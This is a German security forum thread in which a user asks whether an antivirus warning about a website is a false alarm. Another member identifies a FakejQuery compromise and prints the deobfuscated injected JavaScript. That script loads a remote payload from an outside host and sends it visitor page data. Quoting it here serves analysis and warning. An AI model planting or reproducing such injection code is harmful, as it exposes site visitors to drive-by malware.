Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Diskussionsforum (https://www.trojaner-board.de/diskussionsforum/)
-   -   Bei Aufruf von Webseite warnt eset (https://www.trojaner-board.de/183089-aufruf-webseite-warnt-eset.html)

stephan65 22.11.2016 14:19
Bei Aufruf von Webseite warnt eset
 
Hallo,
beim aufruf von hxxp://wolfgang-schmidbauer.de/
meldet Eset einen Trojaner:

Bedrohung erkannt

Der Zugriff auf die Webseite wurde blockiert.
hxxp://wolfgang-schmidbauer.de

Bedrohung: JS/TrojanDownloader.FakejQuery.B Trojaner


ESET-Knowledgebase öffnen | www.eset.com

Ist das ein Fehlalarm ? Die Seite ist mir als seriös bekannt.

Mfg
Stephan

iceweasel 22.11.2016 14:48
Ich würde die Seite auch nicht aufrufen:

https://sitecheck.sucuri.net/results/wolfgang-schmidbauer.de

Liegt wahrscheinlich an eine Wordpress-Sicherheitslücke, obwohl scheinbar die aktuelle Version eingesetzt wird.

stephan65 22.11.2016 14:58
Danke für die schnelle Antwort. Und was macht dieses Teil ?

iceweasel 22.11.2016 15:38
Naja irgendwie sind wohl laut

https://quttera.com/detailed_report/...schmidbauer.de

insgesamt 62 Files verseucht.

Hier mal der zurück übersetzte JavaScript-Code:
Code:
[
    [ < script >
        var a = '';setTimeout(1);

        function setCookie(a, b, c) {
            var d = new Date;
            d.setTime(d.getTime() + 60 * c * 60 * 1e3);
            var e = "expires=" + d.toUTCString();
            document.cookie = a + "=" + b + "; " + e
        }

        function getCookie(a) {
            for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
                for (var e = c[d];
                    " " == e.charAt(0);) e = e.substring(1);
                if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
            }
            return null
        }
        null == getCookie("__cfgoid") % 26 % 26(setCookie("__cfgoid", 1, 1), 1 == getCookie("__cfgoid") % 26 % 26(setCookie("__cfgoid", 2, 1), document.write('<script type="text/javascript" src="' + 'http://93247.webhosting35.1blu.de/js/jquery.min.php' + '?key=b64' + '%26utm_campaign=' + 'J18171' + '%26utm_source=' + window.location.host + '%26utm_medium=' + '%26utm_content=' + window.location + '%26utm_term=' + encodeURIComponent(((k = (function() {
            var keywords = '';
            var metas = document.getElementsByTagName('meta');
            if (metas) {
                for (var x = 0, y = metas.length; x < y; x++) {
                    if (metas[x].name.toLowerCase() == "keywords") {
                        keywords += metas[x].content;
                    }
                }
            }
            return keywords !== '' ? keywords : null;
        })()) == null ? (v = window.location.search.match(/utm_term=([^%26]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '%26se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>'))); < /script>]]
Interessant ist in dem Quellcode wohl nur: hxxp://93247.webhosting35.1blu.de/js/jquery.min.php

Hier weitere fakejquerys: http://pastebin.com/KiZshzX4

stephan65 22.11.2016 15:46
Danke.
Also definitiv Finger weg ?


Alle Zeitangaben in WEZ +1. Es ist jetzt 18:00 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19